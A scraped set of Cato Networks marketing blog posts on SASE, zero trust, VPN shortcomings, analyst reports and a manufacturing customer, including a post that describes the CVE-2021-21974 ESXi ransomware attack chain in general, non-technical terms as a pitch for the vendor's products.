They can't move as fast as a modern digital business requires. Everything is managed through tickets, and involves multiple staff members due to the complexity of the underlying solutions architecture
They can't offer a future-proof solution. They are dependent on their vendors' roadmap, and usually are last to apply updates and enhancements due to the complexity and risk of downtime.
The bottom line is that, unless they manage a real SASE architecture underneath, they are simply not the right fit for the needs of modern, digital enterprises.
9. How is Cato SASE a better value than Netskope SASE?
Enterprises today are looking to consolidate services as much as possible realizing it will improve simplicity, agility, efficiency, and productivity. Netskope offers one point product (SWG+CASB) focused on internet and cloud security, another point product (NPA) focused on ZTNA, and they recently acquired a very small SD-WAN company (Infiot) for their SD-WAN technology.
While Cato and Netskope share the common vision of a SASE solution delivered as a Service from the cloud, the main difference is in the architecture design. While the Cato architecture has been built from the ground up with a converged approach with networking and security services delivered from a single home-grown software stack, Netskope started as a CASB/DLP solution and has later expanded its services portfolio by integrating multiple point solutions together because of several acquisitions, the last one being a small SDWAN provider called Infiot acquired in August 2022. Stitching point solutions together, even if done in the cloud, still poses questions on how these services can seamlessly scale and how much time it will take, for example, to get the SD-WAN technology fully integrated in the Netskope product suite, or to lift their FWaaS engine to an acceptable level to protect the East-West traffic.
In essence, whilst Netskope has a strong SSE proposition, their complete SASE offering is still not fully baked.
If you are looking for simplicity, agility, efficiency, and productivity today, and not in 2-3 years, Cato is the best solution.
10. What incentive would a business have to switch from Fortinet to SASE via Cato?
Improved productivity - Cato can help you optimize application performance and user experience. The Cato SASE Cloud has a global private backbone which minimizes the exposure of network traffic to the unpredictable and unreliable internet
Improved efficiency - By moving from on-premise appliances to a cloud-native solution, procurement, management, and maintenance cost are dramatically reduced. Team members are freed to focus on business needs and outcomes instead of maintenance and support.
Improved agility - Whether tomorrow’s need will be additional security capabilities, business expansion, cloud migration or a new balance between office and remote work, a cloud-native network and security infrastructure allows you to meet new business requirements much faster than appliance-based infrastructure that mandates complex planning, sizing, procurement, deployment, integration, and maintenance.
Cato SASE business value
11. How will SASE have an impact on our existing infrastructure?
SASE has many capabilities that can augment your existing infrastructure today and replace it tomorrow to make your infrastructure more agile, secure, and efficient. For example, you can use a global private backbone to augment SD-WAN with a reliable global transport. You can offload internet security from your resource-constrained on-prem firewalls to an unlimited cloud-delivered security. You can also enable more users to work from remote without adding more VPN servers and without compromising on security or productivity.
12. Are you able to advise on any effort that Cato may have invested in reassuring potential Financial Service customers that the solution meets regulatory requirements?
Cato customers, including those from the financial services sector, all rely on us for their mission critical network and network security. To get their trust, we work continuously to make sure our enterprise network and our cloud service adhere to the highest security standards such as ISO, SOC, GDPR and others. Please see here for more details.
13. Are there any statistics or case studies that show typical cost savings achieved through migration from legacy networks and security to the Cato SASE solution?
Cato commissioned Forrester to run a survey across Cato Networks customers to quantify the benefits these customers have achieved in adopting the Cato SASE solution. The Total Economic Impact (TEI) report shows a stunning ROI of more than 240% when looking at the following benefits:
Reduced operation and maintenance
Reduced time to configure
Retired legacy systems (on-prem FW, SD-WAN)
The TEI document can be downloaded from here.
Cato SASE capabilities
14. Is it possible to implement the SASE architecture in countries such as: Spain, Italy, Colombia, Chile, Mexico and Venezuela?
If the SASE architecture is cloud-native, there are no limits to where it can be implemented. The implementation and availability are the responsibility of the SASE vendor. As a customer, you should focus on making sure there are SASE PoPs available withing 25ms round trip time from your users, branches, and datacenters. Cato’s SASE backbone consists of more than 75 POPs around the world with presence in all five continents, including China. New POPs are added on a quarterly basis to guarantee our customers a guaranteed minimum latency. More information can be found here.
15. Is Cato able to connect to other Next-gen firewalls through an IPsec / VPN tunnel?
Cato allows third party devices to connect to the Cato SASE cloud by means of an IPsec tunnel. A potential use case could be to leverage an existing NGFW for East-West traffic in the local premises and use the Cato Cloud to provide secure internet connectivity and East-West traffic protection for geographical sites.
16. Is it possible to interconnect two components of SASE from different vendors (e.g., Cato SASE to Cisco Viptela SD-WAN)?
Cato allows third party devices to connect to the Cato SASE cloud by means of an IPsec tunnel. Third party SDWAN devices will provide reliable connectivity to the Cato SASE cloud, once the traffic lands into one of our POPs, Cato handles security and middle-mile connectivity via the Cato private backbone.
17. How is security as a service, which is part of SASE, received by customers who have stringent compliance requirements like PCI-DSS / HIPPA etc.?
Organizations that are planning to migrate their network and security stack to the cloud must ensure they’re partnering with trusted providers who maintain the necessary levels of safeguarding and discipline of their own service security. The enterprise must evaluate the SASE vendor and make sure they adhere to the highest industry standards. Cato SASE services have received ISO27000, GDPR, SOC1, SOC2, SOC3 certifications. And with the Cato CASB solution, enterprises can configure their application control policies so that only applications which are compliant with PCI-DSS and/or HIPAA are authorized.
An old vulnerability has recently been making waves in the world of cybersecurity, and that is the catchily named CVE-2021-21974. The ransomware attack that exploits...
The Resurrection of CVE-2021-21974: The Ransomware Attack on VMware ESXI Hypervisors that Doesn’t Seem to Go Away An old vulnerability has recently been making waves in the world of cybersecurity, and that is the catchily named CVE-2021-21974. The ransomware attack that exploits a vulnerability in VMware ESXi hypervisors, has reportedly hit over 500 machines this past weekend. Shodan data indicates that many servers were initially hosted in the OVHcloud, but the blast radius appears to be constantly expanding.
So serious is the outbreak that it has gained the attention of CERT-FR (the French government center for monitoring, alerting and responding to computer attacks), which has issued an advisory warning of the vulnerability. This is the first advisory of 2023, only proceeded by a Fortinet SSL-VPN issue which was announced in December 2022.
But the biggest problem is that the CVE was originally issued two years ago when researchers at Trend Micro discovered and reported the vulnerability to VMware! That’s two years where organizations didn’t patch and upgrade their servers to mitigate against this vulnerability.
Why is CVE-2021-21974 a concern?
The researchers discovered that vCenter Server, the centralized management platform for VMware, was susceptible to an attacker executing arbitrary code with privileged levels of access. The vCenter Server is the beating heart of a company’s virtual infrastructure. It’s the place where administrators go to manage virtual machines, networks, storage, and more.
By exploiting this vulnerability, an attacker could potentially gain access to sensitive information, disrupt operations, and cause significant damage to an organization's virtual infrastructure. While VMware took steps to address this exploit, it required manual intervention on behalf of administrators to install and deploy the fix.
How does this exploit work, and how can you stay protected?
This exploit follows the traditional hallmarks of the ransomware attack chain. Let’s walk through what that looks like for enterprises with and without Cato:
Step 1) Initial access
Legacy networks provide users with access to the complete network. As such, attackers have a wide range of attack vectors to gain initial access to the network and then to move laterally and attack the VMware vCenter Server. Vectors include phishing attacks, network intrusion, or exploitation of another vulnerability.
Cato implements a zero-trust access model, which restricts a user’s resource access and decreases the attack surfaces. It’s no longer sufficient for attackers to gain initial access to the network. They must gain access to a user or machine with access to vCenter vServer. Cato’s ZTNA includes constant device and user assessment, user access control and posture checks to ensure that initial access is not possible. If someone attempts to click on a phishing link, Cato’s SWG and FWaaS can detect, block, and log this connection – ensuring that your perimeter always remains secure.
Step 2) Exploitation
The attacker exploits the vulnerability in the vCenter Server by sending a specially crafted request to the server. This request contains malicious code that the attacker wants to execute on the vCenter Server. Sometimes this is done via vulnerability chaining (using one vulnerability to expose another), while other times you just focus on a single exploit.
Should an attacker gain access to a machine with access to the vCenter vServer, exploiting the vulnerability will still be impossible. Our security engines, including our IPS, identify and block the malicious code before the server can even be compromised. To be clear, even though the server has not yet been patched and, in theory, would be vulnerable, Cato mitigates the attack surface area without you having to do anything. And, yes, Cato does protect against CVE-2021-21974. We have for years.
Step 3) Code execution:
Upon receiving the request, the vCenter Server processes the request, which then causes the malicious code to be executed on the server. This allows the attacker to execute arbitrary code with the privileges of the vCenter Server
This phase is bypassed, as we have blocked the attacker from gaining access to the network, as well as blocking any malicious traffic. In the rogue event that a machine was compromised with ransomware while not being protected by Cato, our converged security solutions would prevent the lateral movement of malware throughout your network (north/south and east/west) while also providing an insight into this risk within the Cato Management Application.
Step 4) Data theft or disruption
The attacker can now access sensitive information stored on the vCenter Server or disrupt operations within the virtual infrastructure. The attacker could potentially steal sensitive information, disrupt virtual machines, deploy ransomware or even completely shut down the virtual infrastructure.
Information is secure as Cato has stopped every step of the attack lifecycle prior to this stage. However, if someone has compromised a device in a way that hasn’t been caught, Cato’s DLP capabilities will prevent exfiltration and theft of sensitive information.
[boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/"] Rapid CVE Mitigation by Cato Security Research | See Selected Critical CVEs [/boxlink]
What’s your choice?
This CVE is one of thousands which appear in the cybersecurity landscape every week, against hundreds of vendors. If you’re a network or security practitioner who’s responsible for managing a large stack of servers, which option would you choose to ensure your network doesn’t get breached?
Do you want to spend a large portion of your life chasing patches and securing vulnerabilities, deploying packages and making sure every hole of your leaking ship has been plugged?
Or should you adopt a converged stance for networking and security, and allow Cato Networks to protect you at each step of the attack cycle with minimal involvement required?
I know which option I would want....
To learn more about CVE-2021-21974 and other goodies, check out this episode of CyberTalk, our video series dedicated to raising cybersecurity awareness everywhere.
With the increased of cloud adoption has come an expansion of the corporate digital attack surface. Cyber criminals are constantly evolving their tools and techniques,...
The Future of Network Security: Cybersecurity Predictions for 2023 & Beyond With the increased of cloud adoption has come an expansion of the corporate digital attack surface. Cyber criminals are constantly evolving their tools and techniques, creating new threats, and pushing organizations to the brink.
As new trends emerge in both cyber attacks and defenses every year, we have decided to list our predictions for the top network security trends of 2023 and beyond.
#1. Zero Trust Becomes the Starting Point for Security
The goal of zero trust is to eliminate the main culprits of data breaches and other security incidents: implicit trust and excessive permissions. These play a major role in many cyberattacks as cyber criminals gain access to an organization’s network and systems, and expand that reach to exploit resources. Eliminating blind trust and limiting access with the least priviliges necessary to maintain productivity, makes this harder for an attacker to achieve.
Zero trust has gained more momentum in recent years and have become a realistic security focus. An effective zero trust strategy defines granular policies, enforces appropriate access permissions, and delivers more granular control of users on your network.
An effective Zero Trust strategy will protect organizations against many cyber threats, but it is far from a comprehensive solution. Ideally, companies will start with zero trust and then add additional controls to build a fully mature security program. Zero Trust is a journey, so having the right strategy will help smooth and expedite this journey, allowing it to move from a security goal to a security reality.
#2. Security Simplification Picks Up Steam
Every organization’s IT infrastructure and cybersecurity threat landscape is different; however, most companies will face similar challenges. Cyber criminals are more adept at targeting and exploiting weaknesses in networks and applications. SOC analysts suffer from alert overload due to high volumes of false positives. And the expansion of complex, multi-cloud environments introduce new security challenges and increased attack vectors.
Addressing these threats with an array of standalone products is unproductive, unscalable and is an ineffective approach to network security. As a result, companies will increasingly adopt security platforms that offer a converged set of security capabilities in a single architecture, enabling security teams to more effectively secure and protect complex infrastructures.
#3. Faster Adoption of SASE
Digital Transformation is forcing corporate networks to more rapidly evolve away from the complex, inflexible architectures of the past. Cloud adoption, work from anywhere (WFA), BYOD policies, and mobile devices are all making the corporate networking environment more complex and challenging to manage, optimize, secure and scale. Additionally, legacy perimeter-based security architectures have become unsustainable, forcing organizations to decide between reliable network connectivity and complete in-depth security.
As a result, companies will more quickly adopt solutions designed specifically for these modern networks. Such modern networks require a converged, cloud-delivered architecture that is reliable and resilient and grows as their business grows; This can only be achieved with Secure Access Service Edge (SASE).
#4. Expansion of Targeted Ransomware Attacks
Ransomware has proven to be an extremely profitable enterprise for cyber criminals. The secrets sauce of ransomware success is the in-depth research on attack targets - identifying the best attack vector, the most valued resources to attack, and the maximum amount a victim might be willing to pay. So considering that some countries are already in recession and many organizations are pressing to optimmize costs to remain profitable, cyber criminals will identify the weaker, more vulnerable targets and push them to the edge.
In recent years, we have seen healthcare, financial service, and more recently, manufacturing as prime targets for ransomware attacks. We expect to see these and more as attacks expand, exponentially, in 2023 and beyond.
[boxlink link="https://www.catonetworks.com/resources/sase-vs-the-upside-down-world-of-networking-and-security/"] SASE vs. the Upside Down World of Networking and Security | Download the eBook [/boxlink]
#5. Growing Importance of API Security
Modern applications are designed around APIs, and as such, application security practices depend, tremendously, on API security practices. APIs are designed to allow other programs to automatically request or submit data or perform other actions.
The design of APIs makes them an ideal target for certain types of automated attacks such as credential stuffing, vulnerability scanning, distributed denial-of-service (DDoS) attacks, and others. As cybercriminals increasingly target these APIs, implementing defenses against API-specific attack vectors becomes more crucial for business success.
#6. IoT Will See More Cyberattacks
Internet of Things (IoT) devices are experiencing tremendous growth. The expansion of 5G networks provides fast, high-performance network connectivity, making it possible to deploy these devices everywhere. As these devices mature, they will increasingly be used to collect, process, and store sensitive business data.
However, these devices, while increasingly valuable to many organizations, are at high risk for attack or compromise. A huge threat to IoT devices is that they are always available, making them ideal targets continuous attacks. Often, these devices have weak passwords, unpatched vulnerabilities, and other security issues. As they are increasingly deployed on corporate networks and entrusted with sensitive and valuable data, cyberattacks against them will continue to increase.
#7. Cyberattacks Will Increasingly Become Uninsurable
Cybersecurity insurance is one of the primary ways that organizations manage cybersecurity risk. For some it has also become their default cybersecurity strategy. When these companies suffer a ransomware attack, they expect their insurance provider to pay all costs, including the ransom and the costs of recovery and notifications.
However, the surge in expensive ransomware attacks has caused some insurance providers to explore options in their coverage schemes. This includes placing more requirements on customers to demonstrate improved cyber defenses and compliance with security standards as conditions for acquiring and maintaining an insurance policy. The end result may be limiting coverage parameters, and if attacks continue to grow more common and expensive — which they likely will — eliminating coverage all together.
#8. Cyber Resilience Becomes an Executive Priority
Cybercriminals are increasingly moving toward attacks focused on business disruption. Ransomware attacks deny access to critical company resources. Other notable attacks render corporate systems inaccessible to legitimate users. As a result, companies are compromised as cybercriminals threaten their ability to operate and maintain profitability.
The growing threat of cyberattacks to the business will make cyber resilience a priority for C-level executives. If cyberattacks can bring down the business, investing in preventive solutions that can manage or mitigate these risks makes good strategic and financial sense.
What These Predictions Mean for Enterprises
In 2023, the evolution of the cybersecurity landscape will drive the evolution of corporate security platforms. Legacy security architectures will need to be replaced with solutions designed for the modern, more dynamic IT architecture and rapidly evolving cyber threats.
The Cato SASE Cloud and SSE 360 solutions helps companies implement security architectures that offer holistic, 360-degree protections against the latest cyber threats. To learn how Cato can help your organization improve its network performance and security, sign up for a demo today.
Today we announced that Cato Networks was named a “Leader” and “Outperformer” by GigaOm in the analyst firm’s Radar for SD-WAN Report. This is our...
Cato SASE Cloud’s “Innovation” and “Platform Play” Earn “Leader” and “Outperformer” Status in GigaOm SD-WAN Radar Report Today we announced that Cato Networks was named a “Leader” and “Outperformer” by GigaOm in the analyst firm’s Radar for SD-WAN Report. This is our first year to be included in the report and already we shot to the top of the leader’s circle, underscoring the strength and maturity of Cato SD-WAN and showing the importance of considering SD-WAN as part of a broader SASE offering.
The report evaluates 20 notable SD-WAN vendors, including Cisco, Fortinet, Versa Networks, Juniper, Palo Alto, VMware, and others. Of all these SD-WAN providers, Cato Networks is the only one rated as Exceptional in all the key criteria considered to be differentiators among the providers as well as the primary features for customers to consider as they compare solutions.
Figure 2: Only Cato scored “Exceptional” across every one of GigaOm’s Key Criteria
GigaOm: Cato’s SD-WAN Is “Easier to Maintain and Scale”
The report highlights Cato’s unique cloud-based approach to delivering SD-WAN as a real differentiator that makes a software-defined wide area network easier to maintain and scale for business needs.
“Cato SASE Cloud is a converged cloud-native, single-pass platform connecting end-to-end enterprise network resources within a secure global service managed via a single pane of glass,” says the report. “By moving processing into the cloud using thin edge Cato Sockets, Cato SASE Cloud is easier to maintain and scale than competitive solutions, with new capabilities instantly available. Leveraging an expanding global SLA-backed network of over 75 PoPs, Cato is the only SD-WAN vendor currently bundling a global private backbone with its SD-WAN. Moreover, Cato offers both a standalone SD-WAN solution and a security service edge solution – Cato SSE 360 – for securing third-party SD-WAN devices.”
[boxlink link="https://www.catonetworks.com/resources/gigaoms-evaluation-guide-for-technology-decision-makers/?utm_source=blog&utm_medium=top_cta&utm_campaign=gigaom_report"] GigaOm’s Evaluation Guide for Technology Decision Makers | Report [/boxlink]
Cato Is a Strong “Platform Play” with “Innovation”
The report places Cato as the only vendor with a strong “Platform Play” and “Innovation” in features. According to the report, “Positioning in the Platform Play quadrant indicates that the vendor has a fully integrated solution – usually built from the ground up – at the functional level.” The report additionally recognizes Cato as an Outperformer “based on the speed of innovation compared to the industry in general.” GigaOm calls Cato “a vendor to watch” for its innovation.
Read the GigaOm report for yourself to see why Cato SASE Cloud is the leader of the SD-WAN pack.
The manufacturing industry is constantly evolving. The revolution known as Industry 4.0 is introducing new technologies and innovations that are accelerating digitization and improving efficiency...
How SASE is Transforming the Manufacturing Industry The manufacturing industry is constantly evolving. The revolution known as Industry 4.0 is introducing new technologies and innovations that are accelerating digitization and improving efficiency and productivity. One of these new innovations technologies is SASE (Secure Access Service Edge).
What is SASE?
SASE is an enterprise networking and security category that converges network and security technologies into a single, cloud-native service. Converged functionalities include SD-WAN, Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
SASE reduces the risk of cybersecurity breaches and enables global access to applications and systems. It also provides enterprises and plants with the ability to remove the cost and overhead incurred when maintaining complex and fragmented infrastructure made of point solutions. As a result, SASE is gaining momentum across multiple industries, including manufacturing.
[boxlink link="https://catonetworks.easywebinar.live/registration-sase-value-and-promise-in-manufacturing"] SASE’s Value in Manufacturing | Go to Webinar [/boxlink]
How Manufacturers Benefit from SASE
Manufacturers can replace their legacy networking solutions, like MPLS, with SASE, to benefit from the capabilities SASE provides. Main benefits include:
Global connectivity: SASE provides the ability to securely connect tens of thousands of employees across dozens of plants around the globe to SaaS and on-premises applications. SASE can connect any network: the internet, MPLS, cellular networks and more.
Remote access: SASE supports the shift of workers to home offices by enabling a hybrid work environment.
Cloud connectivity: SASE enables users to access any production applications that migrated from on-prem to the cloud, while still supporting on-premises infrastructure.
Flexibility: SASE provides the infrastructure that enables producing innovative new products and reinventing outdated manufacturing processes.
Speed and performance: SASE enables manufacturers to increase bandwidth. Some manufacturers have been able to achieve 3x their previous WAN bandwidth.
Cost reduction: Some manufacturers have saved up to 30% annually by transitioning to SASE. In addition, SASE frees up employees to focus more on strategic projects that can benefit the business.
Smooth transition: SASE can be deployed quickly which makes the process nearly hassle-free.
Improved user experience and collaboration: SASE improves employee satisfaction and productivity by enhancing connectivity speed and performance.
Enhanced security: SASE enables faster detection, identification, response and remediation of cybersecurity incidents.
Spotlight: O-I Glass
O-I Glass, an Ohio-based glass bottles manufacturer, deployed Cato’s SASE Cloud solution as a replacement to their previous MPLS solution. By transitioning to SASE, O-I Glass was able to provide faster, more secure and higher performing access to their 25,000 employees spread across 70 plants in 19 countries. SASE also supports their employees’ secure connectivity when they work from home. The transition itself took six months and the estimated cost savings are 20% to 30% compared to their previous solutions.
By implementing SASE, O-I Glass was also able to deploy innovative methods for improving the manufacturing process. They introduced HoloLens, the Microsoft augmented reality/mixed reality system. These headsets are helping their engineers collaborate. When wearing them, engineers located in different continents can see what the other is seeing, without requiring trans-atlantic flights. Before SASE, their infrastructure could not support such use. In addition, SASE supports their future plans for a modular glass production line as well as plans for plant maintenance and training.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
Your SSE project is coming up. As an IT professional, you will soon need to organize the requirements for your enterprise’s security transformation journey. To...
The SSE RFP/RFI Template (or how to evaluate SSE Vendors) Your SSE project is coming up. As an IT professional, you will soon need to organize the requirements for your enterprise's security transformation journey. To assist with this task, we’ve created a complimentary RFP template for your use. This template will help you ensure your current and future security threats are addressed and that your key business objectives are met.
The RFP template comprises four sections:
Business and IT overview: Your business, project objectives, geographies, network resources, security stack, and more.
Solution architecture: The architectural elements of the solution, how they operate, where they are situated, scaling abilities, failure resolution capabilities, and more.
Solution capabilities: The functionalities provided by the solution.
Support and services: The vendor’s support structure and available managed services.
You can find the complete template, with more details and guidance, here.
Please note, the template covers core SSE requirements alongside extended capabilities like FWaaS, NGAM, IPS and global private backbone. These additions will give you flexibility to expand into these projects in the future. So, let’s examine each one of these sections briefly.
[boxlink link="https://www.catonetworks.com/resources/ensuring-success-with-sse-rfp-rfi-template/"] SEE RFI/RFP Made Easy | Get the Template [/boxlink]
Business and IT Overview
In this section, you will describe your company, including elements like your business and technical goals, other strategic IT projects you are managing, the project scope, your current security architecture and technologies, datacenters geographies, your cloud providers, and more.
This section is intended to provide the vendor context about your business. Therefore, it is recommended to elaborate as much as you can.
This section allows the vendor to describe the solution’s architecture and how its services are delivered. In addition, you will get answers to questions about the solution’s architecture strategy. For example, what is their approach to consolidating security capabilities? How is high availability and resiliency provided? How easy is it to scale? These are a few of the many questions this section will help answer.
This section requires the vendor to describe their SSE security capabilities. These include SWG, ZTNA CASB and DLP, and security management analytics and reporting. Additional requested information can include advanced threat prevention, threat detection and response, east-west security, policy management and enforcement, and non-web port traffic protection.
Support and Services
This section will enable you to understand the vendor’s support and managed services. You will get answers to support availability, SLAs, professional services and managed services options.
In addition to these four sections, the template also provides a fifth section about future expansion options. This forward-looking section helps you understand how easy it will be to transition to SASE, if required. From our experience, for many organizations this is the next step after basic SSE. This section will provide you with information about the migration process, configuration complexity, which technologies are required, and more.
How to Use the RFP Template
The RFP template can help choose the right SSE vendor for your current and future network security needs. To review and start using the entire template, click here.
Ever since Secure Access Service Edge (SASE) was adopted by every significant networking provider and network security vendor, IT leaders have been waiting for a...
Gartner’s Market Guide to Single-Vendor SASE Offerings: The Closest Thing You’ll Get to a SASE Magic Quadrant Ever since Secure Access Service Edge (SASE) was adopted by every significant networking provider and network security vendor, IT leaders have been waiting for a Gartner SASE Magic Quadrant.
And for good reason.
The industry has seen widely different approaches to what’s being marketed as SASE. Some companies partnered with each other to offer a joint solution with slightly integrated products. For example, Zscaler and any number of SD-WAN partners. Others simply rebranded their existing solutions as SASE. Think VMware SD-WAN (previously VeloCloud) turning into VMware SASE.
Market consolidation has brought together still other companies with disparate services requiring years’ worth of integration. As an example, consider HPE, Aruba and Silver Peak and the integration work ahead of them to make a cohesive SASE product. Meanwhile, we at Cato Networks chose a different path: to build a fully converged, global networking and security solution from the ground up. Gartner calls this “single-vendor SASE.”
A SASE Magic Quadrant would clear up the confusion in the industry and separate the leaders from losers. But while Gartner may not yet be ready to issue a SASE Magic Quadrant, the firm has issued the next best thing -- Market Guide for Single-Vendor SASE. The report takes a close look at the SASE market and specifically at single-vendor SASE.
The Single-Vendor SASE Market is Projected to Grow Substantially
Gartner defines a single-vendor SASE offering as one that delivers converged network and security as-a-service capabilities using a cloud-centric architecture. Cato is the prototypical single-vendor SASE leader. Example services that are part of a single-vendor SASE offering are SD-WAN, SWG, FWaaS, ZTNA, and CASB. All of those service, and this is key, are fully converged together in the underlying architecture, service delivery, and management interface. They truly are one cloud service, which is what separate single-vendor SASE from other approaches.
These converged services might also be the full roster of capabilities for the newest single-vendor SASE entries but they are only the starting point for Cato. In addition to those services, Cato also offers a global private backbone, data loss prevention (DLP), rapid CVE mitigation, managed threat detection and response, SaaS optimization, UC and UCaaS optimization, and a range of other capabilities.
According to Gartner, there should be rapid growth in single-vendor SASE implementation in the next few years. While only 10% of deployments were single-vendor SASE solution last year, Gartner expects a third of all new SASE deployments by 2025 to be single-vendor. By the same timeframe, half the new SD-WAN purchases will be part of a single-vendor SASE offering.
The market’s growth is largely being driven by the desire for simplicity by reducing the number of deployed solutions and vendors. Of course, reducing complexity while still offering enterprise-class capabilities is something Cato has been delivering for years.
[boxlink link="https://www.catonetworks.com/resources/gartner-market-guide-for-single-vendor-sase/?utm_medium=blog_top_cta&utm_campaign=gartner_single_vendor_sase"] Gartner® Market Guide for Single-Vendor SASE | Report [/boxlink]
Cato Was Ahead of Its Time in This “Adolescent” Market
“A single-vendor SASE must own or directly control (OEM, not service chain with a partner) each of the capabilities in the core category,” according to the report authors. A “well-architected” solution must have all services fully integrated, a single unified management plane and a single security policy, a unified and scalable software-based architecture, and flexibility and ease of use. The report lists core functional requirements in each of the areas of secure web gateway, cloud access security broker, zero trust network access, and software-defined WAN.
Gartner points out that there are several vendors in the “adolescent” industry that meet the analyst firm’s minimum requirements. There are more, still, that come close but aren’t quite there with their offerings.
Because single-vendor SASE brings together networking and security into one solution with many functions, Gartner recommends that a joint team of network professionals and security experts be appointed to evaluate the solutions based on the organization’s foremost needs.
Single-Vendor SASE Has Lots of Benefits
The benefits of single-vendor SASE are many. Gartner cites the following as reasons to go this route for a SASE solution:
An improved security posture for the organization – This is based on reduced complexity of the various security functions, a single policy enforced everywhere, and a smaller attack surface.
Better use of network and security staff – Deployment times are reduced, fewer skills and resources are needed to manage a unified platform, a single policy is applied throughout the various security functions, and redundant activities go away.
Improved experiences for users and system administrators – Performance issues such as latency and jitter are easier to tame or eliminate, it’s easier to diagnose issues end-to-end, and there is a single repository for logs and other event data.
Of course, implementing such a solution can have its challenges as well—like how to deal with organizational siloes, and what to do about existing IT investments. Global coverage can be an issue for the early-stage vendors. Fortunately, Cato has extensive coverage with 75+ PoPs around the world today. Gartner says solution maturity can be an issue, but that’s mainly a problem for the neophyte vendors. With more than 8 years in the single-vendor SASE business behind us, Cato is one of – if not the – most mature vendor in the market.
Gartner Offers Recommendations
As with all Gartner guides, the research firm has recommendations pertaining to strategy and planning, evaluation, and deployment:
Establish a cross-functional team including people from both networking and security to increase the potential for a successful implementation.
Evaluate single-vendor SASE against the backdrop of multi-vendor and managed offerings to determine which method would provide the most flexibility.
“Choose single-vendor SASE offerings that provide single-pass scanning, single unified console and data lake covering all functions to improve user experience and staff efficacy.” (Spoiler alert: Cato provides all of these things.)
Do a Proof of Concept project with real locations and real users to see how well an offering can meet your needs. (Cato is happy to set you up with a PoC today.)
If you are looking for the most mature and feature-rich single-vendor SASE offering with the largest number of worldwide PoPs, look no further than Cato Networks. Request a demo at https://www.catonetworks.com/contact-us/.
The face of the modern corporate network is changing rapidly. Digital transformation initiatives, cloud adoption, remote work, and other factors all have a significant impact...
Remote Access VPNs are a Short-Term Solution The face of the modern corporate network is changing rapidly. Digital transformation initiatives, cloud adoption, remote work, and other factors all have a significant impact on where corporate IT assets are located and how corporate networks are used.
Companies looking to provide secure remote access to their off-site employees have largely chosen to expand their existing virtual private network (VPN) deployments. However, this is a short-term solution to the problems of the increasingly distributed enterprise. VPNs are ill-suited to meeting modern business needs and will only become less so in the future. It’s time for a change.
Secure Remote Access Has Become Business-Critical
Until a few years ago, most or all of an organization’s employees worked almost exclusively from the office. As a result, many corporate security infrastructures were perimeter-focused, working to protect employees and systems inside the office from external threats.
However, remote work has become normalized in recent years. Companies have been slowly shifting toward supporting remote work for some time now, and the pandemic accelerated this shift. Even as some companies try to pull workers back to the office, a higher percentage of employees are working remotely, at least part-time, than before the pandemic.
The ability to support remote work has become a critical capability for modern business. The popularity of remote work has made remote or hybrid work programs important for attracting and retaining talent. Additionally, a remote work program can also be a key component of a business continuity and disaster recovery (BC/DR) strategy as employees can work remotely in response to power or Internet outages, extreme weather, or public health crises.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/"] Why remote access should be a collaboration between network & security | White Paper [/boxlink]
A Remote Access VPN Doesn’t Meet the Needs of the Modern Enterprise
A central component of an organization’s remote work program is secure remote network access. Employees need to be able to access corporate networks, resources, and data without fear of eavesdropping or other cyber threats. Historically, many organizations have relied upon VPNs to provide secure remote access. VPNs provide an encrypted connection between two points, securing traffic between a remote user’s computer and the VPN server on the corporate network. The problem is, however, that VPNs don’t meet the business needs of the modern enterprise.
Some of their shortcomings include:
Lack of Scalability: In general, corporate VPN deployments were designed for occasional usage by a small percentage of an organization’s workforce. Continuous usage by a larger group — as many organizations experienced during the height of the pandemic — results in significantly degraded performance and can render VPN deployments unusable for employees.
Performance Degradation: VPNs are point-to-point solutions, meaning that they are often designed to connect remote employees to the headquarters network. With the growth of cloud computing and the distributed enterprise, this can result in inefficient network routing and increased latency.
Nothing but Basic Security: VPNs are designed solely to provide an encrypted connection between a remote employee and the headquarters network. They offer no access control or other security functions to ensure that the traffic they carry is benign or to implement zero-trust access controls.
VPNs are intended to allow employees to securely do their jobs from outside the office. Yet their limitations mean that they offer neither productivity nor security.
VPNs struggle to meet the needs of the modern enterprise, and corporate IT architectures and business needs are rapidly evolving. As a result, the impact of VPNs on business operations will only grow more pronounced in the future.
Some key business operations that will be inhibited by VPNs include:
Regulatory Compliance: Companies are subject to various regulations, and these regulations are periodically updated to reflect updates to the cyber threat landscape and available security solutions. When zero trust and more robust threat monitoring and prevention capabilities become required by law, VPNs will be unable to provide them.
Mobile Support: The use of mobile devices for business purposes has grown dramatically in recent years. VPN deployments designed for desktops and laptops often have lower usability and performance for mobile users.
Cyber Risk Management: The remote workforce is an easy target compared to applications secured behind advanced firewalls and threat prevention tools. Enterprises cannot rely on VPNs to secure remote users, and are required to apply means to minimize risk and exposure to advanced attacks originating from remote user’s devices.
Moving Beyond the VPN
A remote access VPN is a thing of the past. It is a tool designed to implement a connectivity model that no longer works for the modern organization. While VPNs have significant limitations and challenges today, these issues will only be exacerbated over time as networks, threats, and compliance requirements evolve. Switching away from legacy technology today will improve an organization’s security posture in the future.
Secure Access Service Edge (SASE) and Security Service Edge (SSE) solutions with integrated zero trust network access (ZTNA) provide all of the secure remote access capabilities VPN lacks. It is a solution designed for the modern, distributed enterprise that converges a full stack of enterprise network security capabilities. SASE/SSE offers all of the benefits of a VPN and more with none of the drawbacks. Learn more about how Cato SASE Cloud — the world’s first SASE platform — can help you modernize your organization’s secure remote access capabilities by signing up for a free demo today.
Properly implemented, a zero trust architecture provides much more granular and effective security than legacy security models. However, this is only true if a zero...
You’ll Need Zero Trust, But You Won’t Get It with a VPN Properly implemented, a zero trust architecture provides much more granular and effective security than legacy security models. However, this is only true if a zero trust initiative is supported with the right tools. Legacy solutions, such as virtual private networks (VPNs), lack the capabilities necessary to implement a zero trust security strategy.
Zero Trust Security is the Future
Castle-and-moat security models were common in the past, but they are ineffective at protecting the modern network. Some of the primary limitations of perimeter-focused security models include:
Dissolving Perimeters: Legacy security models attempt to secure a perimeter that encapsulates all of an organization’s IT assets. However, with growing cloud adoption, this perimeter would need to enclose the entire Internet, making it ineffective for security.
Insider Threats: A perimeter-focused security model lacks visibility into anything inside of the corporate network perimeter. Insider threats — such as attackers that breach an organization’s defenses, supply chain vulnerabilities, and malicious users — are all invisible to perimeter-based defenses.
